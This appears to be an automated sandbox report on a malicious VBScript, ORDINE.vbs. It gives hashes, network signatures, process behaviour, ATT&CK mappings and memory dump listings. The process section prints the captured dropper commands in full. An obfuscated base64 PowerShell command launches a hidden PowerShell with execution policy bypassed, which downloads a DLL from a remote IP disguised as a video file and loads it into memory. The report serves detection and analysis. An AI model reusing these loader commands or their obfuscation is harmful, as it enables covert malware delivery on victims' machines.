abb023216cf01005730aefe0b0948043285674f51036ab6c568bb76c49ac438c

General

Target

ORDINE.vbs
Size

231KB
MD5

e020cd23ba91c3f6ad9c9ed3d6f391b5
SHA1

c924b29e61a4765cee969e841a76e304b646c168
SHA256

d985cfc667c76c46662c1de784d8d8844af661f9fe421ab9f0a4f8d704002738
SHA512

6f01979834b8de6979bb485edaff44079ca58923b2e333e6e089ef76f73b13e6b5c51d2220163c0a216bc1f5576be4c0fc30867743e7f1ef70054868b083ff86

Score

10^/10

suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/14-07-2022.mp4

Signatures

suricata: ET MALWARE Powershell commands sent B64 3
suricata: ET MALWARE Powershell commands sent B64 3
suricata
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1524 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

528 powershell.exe
1524 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 528 powershell.exe
Token: SeDebugPrivilege 1524 powershell.exe

flow	pid	process
3	1524	powershell.exe

pid	process
528	powershell.exe
1524	powershell.exe

description	pid	process
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1972 wrote to memory of 528	1972	WScript.exe	powershell.exe
PID 1972 wrote to memory of 528	1972	WScript.exe	powershell.exe
PID 1972 wrote to memory of 528	1972	WScript.exe	powershell.exe
PID 528 wrote to memory of 1524	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1524	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1524	528	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDINE.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DI⁂M⁂⁂u⁂Dc⁂Lg⁂x⁂DQ⁂Lg⁂5⁂Dk⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂N⁂⁂t⁂D⁂⁂Nw⁂t⁂DI⁂M⁂⁂y⁂DI⁂LgBt⁂H⁂⁂N⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂HY⁂5wBJ⁂Fc⁂TwBl⁂EI⁂U⁂BM⁂Eo⁂VQDH⁂Gg⁂dwB4⁂C4⁂Z⁂BV⁂HU⁂c⁂Bq⁂FU⁂TQBn⁂GM⁂ZQBR⁂FU⁂xwBQ⁂G4⁂Jw⁂p⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂Ew⁂T⁂Bw⁂Fc⁂VwBx⁂E8⁂a⁂BI⁂Fg⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB3⁂G8⁂bgBr⁂C8⁂Ng⁂y⁂DI⁂Lg⁂2⁂DQ⁂Mg⁂u⁂DI⁂OQ⁂x⁂C4⁂Mg⁂x⁂DI⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxD = [System.Text.encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/14-07-2022.mp4'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('vçIWOeBPLJUÇhwx.dUupjUMgceQUÇPn').GetMethod('LLpWWqOhHX').Invoke($null, [object[]] ('txt.wonk/622.642.291.212//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5b58f29e05438b095975bbb025200ab4

SHA1
bc68b9038223f4341dc178fb6dac862dcd501a3d

SHA256
83f51fde8f22e5c75668dd9e3204ececca01710aaaebf538bb680a27e58b0739

SHA512
bca6969d049aa27ef6f8fc33ece990666e83889283a6a61aaf969bea0ba4c7fe910faafd48adf025ffcd36cff6539cbf3347e69b9bf363a26b78bcb87a75d603

Download Submit
memory/528-64-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/528-70-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/528-59-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/528-58-0x000007FEF33A0000-0x000007FEF3EFD000-memory.dmp

Filesize
11.4MB

Download
memory/528-71-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/528-55-0x0000000000000000-mapping.dmp

Download
memory/528-57-0x000007FEF3F00000-0x000007FEF4923000-memory.dmp

Filesize
10.1MB

Download
memory/1524-65-0x000007FEF33A0000-0x000007FEF3EFD000-memory.dmp

Filesize
11.4MB

Download
memory/1524-63-0x000007FEF3F00000-0x000007FEF4923000-memory.dmp

Filesize
10.1MB

Download
memory/1524-66-0x0000000002064000-0x0000000002067000-memory.dmp

Filesize
12KB

Download
memory/1524-67-0x000000000206B000-0x000000000208A000-memory.dmp

Filesize
124KB

Download
memory/1524-68-0x0000000002064000-0x0000000002067000-memory.dmp

Filesize
12KB

Download
memory/1524-69-0x000000000206B000-0x000000000208A000-memory.dmp

Filesize
124KB

Download
memory/1524-60-0x0000000000000000-mapping.dmp

Download
memory/1972-54-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing